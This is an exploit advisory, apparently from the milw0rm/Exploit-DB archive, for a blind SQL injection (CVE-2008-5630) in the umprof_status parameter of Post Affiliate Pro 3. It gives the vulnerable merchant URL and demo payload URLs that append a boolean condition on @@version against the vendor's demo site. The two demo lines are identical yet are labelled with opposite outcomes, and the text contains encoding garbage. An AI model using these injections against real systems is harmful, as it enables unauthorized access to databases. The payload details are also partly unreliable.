Post Affiliate Pro 3 - 'umprof_status' Blind SQL Injection

Author: XaDoS
type: webapps
platform: php
port: 
date_added: 2008-11-25 
date_updated: 2016-12-29 
verified: 1 
codes: OSVDB-50311;CVE-2008-5630 
tags: 
aliases:  
screenshot_url:  
application_url: 

[â– ]  Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection


>©<

> AuToR: XaDoS
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: http://www.qualityunit.com/postaffiliatepro/

>©<


[â– ] ExPL0iT:

|: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql]

 [you must be merchants]

[■] D£M0:

|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°]

|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)]



[â– ] Th4nKs::

\> Str0ke </
\> Joy Division </
\> Teo Babbeo </
\> Spud </
\> Loooo Z00ooo00oo0 </  Lol ;-)

# milw0rm.com [2008-11-26]